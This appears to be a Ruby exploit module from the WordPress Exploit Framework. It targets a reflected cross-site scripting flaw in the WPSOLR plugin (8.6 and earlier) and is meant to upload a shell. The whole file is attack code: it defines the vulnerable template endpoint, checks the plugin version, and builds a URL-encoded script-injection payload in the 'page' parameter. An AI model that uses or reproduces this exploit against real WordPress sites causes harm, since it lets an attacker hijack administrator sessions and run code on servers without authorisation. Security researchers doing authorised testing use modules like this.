# frozen_string_literal: true

class Wpxf::Exploit::WpsolrReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'WPSOLR <= 8.6 Reflected XSS Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8445'],
        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=303']
      ],
      date: 'Feb 09 2016'
    )
  end

  def check
    check_plugin_version_from_readme('wpsolr-search-engine', '8.7')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_plugins, 'wpsolr-search-engine', 'classes', 'extensions', 'managed-solr-servers', 'templates', 'template-my-accounts.php')
  end

  def url_with_xss
    "#{vulnerable_url}?page=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
  end
end
